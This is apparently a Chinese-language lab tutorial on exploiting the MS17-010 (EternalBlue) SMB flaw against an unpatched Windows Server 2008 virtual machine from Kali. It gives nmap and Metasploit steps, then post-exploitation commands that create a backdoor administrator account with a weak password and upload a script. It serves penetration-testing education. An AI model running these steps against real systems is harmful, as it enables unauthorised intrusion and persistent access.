
本次实验属于内网SMB漏洞利用实操内容。设备VMware 虚拟机、Windows Server 2008靶机、Kali LinuxIP 规划靶机Windows Server 2008 x64 虚拟机IP 地址192.168.XXX.XXX未安装 MS17-010 安全补丁关闭系统防火墙。检测终端Kali Linux 虚拟机IP 地址192.168.xxx.xxx预装 Nmap、Metasploit 工具集。SMB 协议基础SMB即服务器消息块协议是Windows操作系统专属内网通信协议主要实现局域网文件共享、打印机共享、进程管道通信、远程管理等功能依靠两个核心端口提供服务1. 139端口基于NetBIOS协议传输SMB数据多用于老旧Windows系统主机名解析、局域网共享访问2. 445端口TCP直连SMB服务现代Windows系统主流端口无需依赖NetBIOS即可直接完成共享通信。SMB是内网渗透横向移动最常用载体攻击方式分为两类一是合法凭据滥用持有账号密码后通过IPC$、WMI、SMB远程执行命令横向扩散二是协议代码漏洞利用无需账号密码直接通过漏洞代码执行任意系统指令MS17-010永恒之蓝就属于此类高危漏洞。MS17-010漏洞原理漏洞成因Windows系统处理SMB协议特殊数据包时存在内存溢出缺陷攻击者可构造恶意SMB数据包发送至目标445端口绕过系统权限校验直接写入恶意执行代码实现远程代码执行。影响范围Windows Vista、Windows 7、Windows Server 2008、Windows Server 2012等未安装对应安全补丁的系统。危害等级高危无凭据远程代码执行攻击者直接获取系统最高管理员权限。真实场景企业内网大量老旧服务器未及时打补丁黑客通过该漏洞批量控制内网主机植入勒索病毒、窃取业务数据、搭建后门长期驻留内网。步骤1实验环境部署与网络连通校验1. Kali操作打开终端执行权限提升命令切换至root管理员身份避免工具权限不足问题sudo su 输入系统密码后完成权限切换。2. 靶机Windows Server 2008配置打开控制面板→系统和安全→Windows防火墙仅在实验环境下关闭防火墙现实环境严禁操作3. 网络连通测试在Kali终端执行ping命令测试两台虚拟机网络连通性返回数据包无丢失实验环境正常。步骤2Nmap主机与端口信息收集使用Nmap综合扫描脚本探测靶机操作系统版本、开放端口、服务版本信息nmap -T4 -O -v -sV 192.168.xxx.xxx扫描完成后查看输出结果确认139、445端口状态为开放SMB共享服务正常运行满足漏洞利用前置条件。步骤3MS17-010安全风险检测学习1. Nmap内置安全检测脚本对实验环境里的靶机进行安全检查nmap --scriptvuln 192.168.xxx.xxx -v扫描结果提示目标主机存在MS17-010风险。2. 启动Metasploit渗透框架msfconsole3. 在框架内搜索MS17-010相关模块search ms17-0104. 加载漏洞探测模块序号05. 查看模块需要配置的参数6. 设置靶机IP地址参数7. 执行漏洞探测run步骤4后渗透操作1. 调用靶机交互式CMD命令行 shell2. 解决中文文件名、提示乱码问题chcp 650013. 创建后门管理员账号设置密码123456net user admin123 123456 /add4. 将新建账号加入本地管理员组获取最高权限net localgroup administrators admin123 /add5. 输入exit退出CMD终端回到Meterpreter环境上传本地测试脚本至靶机C盘根目录upload /home/kali/test.bat C:\\本文所有内容仅作为课程理论学习全部操作仅在本人搭建的虚拟机环境完成严格遵守《网络安全法》不对非授权设备进行扫描和测试。